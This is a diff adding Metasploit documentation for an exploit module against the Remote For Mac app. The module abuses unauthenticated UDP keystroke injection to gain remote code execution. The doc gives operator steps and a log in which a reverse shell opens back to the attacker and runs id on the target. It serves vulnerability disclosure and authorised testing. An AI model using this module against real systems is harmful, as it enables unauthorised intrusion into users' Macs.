Adds docs

Author: msutovsky-r7

documentation/modules/exploit/osx/misc/remote_for_mac_udp_rce.md

@@ -0,0 +1,43 @@
+## Vulnerable Application
+
+The Remote For Mac app is a remote control software that allows you to turn your iPhone or iPad into a wireless remote controller for Mac.
+The versions up to 2025.7 are vulnerable to unauthenticated UDP control.
+This allows an attacker to send a sequence of UDP packets to the target and simulate keyboard input,
+leaving an option for remote code execution.
+The app can be downloaded from [here](https://rs.ltd/).
+
+
+## Verification Steps
+
+1. Install the application
+1. Start msfconsole
+1. Do: `use exploit/osx/misc/remote_for_mac_udp_rce`
+1. Do: `set RPORT [HTTP port of Remote For Mac]`
+1. Do: `set RHOST [target IP address]`
+1. Do: `set LHOST [attacker IP]`
+1. Do: `set LPORT [attacker port]`
+1. Do: `run`
+
+## Options
+
+### RPORT
+
+The Remote For Mac spawn HTTPS server on semi-random port.
+The HTTP server provides information about running version and whether the authentication is enabled.
+The same port is also used for UDP protocol - this time, the port translated received packets into keyboard strokes.
+
+## Scenarios
+
+```
+msf6 exploit(osx/misc/remote_for_mac_udp_rce) > run verbose=true
+[*] Started reverse TCP handler on 192.168.168.217:4444
+[*] Simulating system keyboard input to open Terminal...
+[*] Initial sequence finished, waiting for terminal to be spawned..
+[*] Sending malicious payload to be executed...
+[+] Payload sent. Awaiting session...
+[*] Command shell session 3 opened (192.168.168.217:4444 -> 192.168.168.175:49197) at 2025-08-28 08:52:44 +0200
+
+id
+uid=501(ms) gid=20(staff) groups=20(staff),12(everyone),61(localaccounts),79(_appserverusr),80(admin),81(_appserveradm),98(_lpadmin),701(com.apple.sharepoint.group.1),33(_appstore),100(_lpoperator),204(_developer),250(_analyticsusers),395(com.apple.access_ftp),398(com.apple.access_screensharing),399(com.apple.access_ssh),400(com.apple.access_remote_ae)
+
+```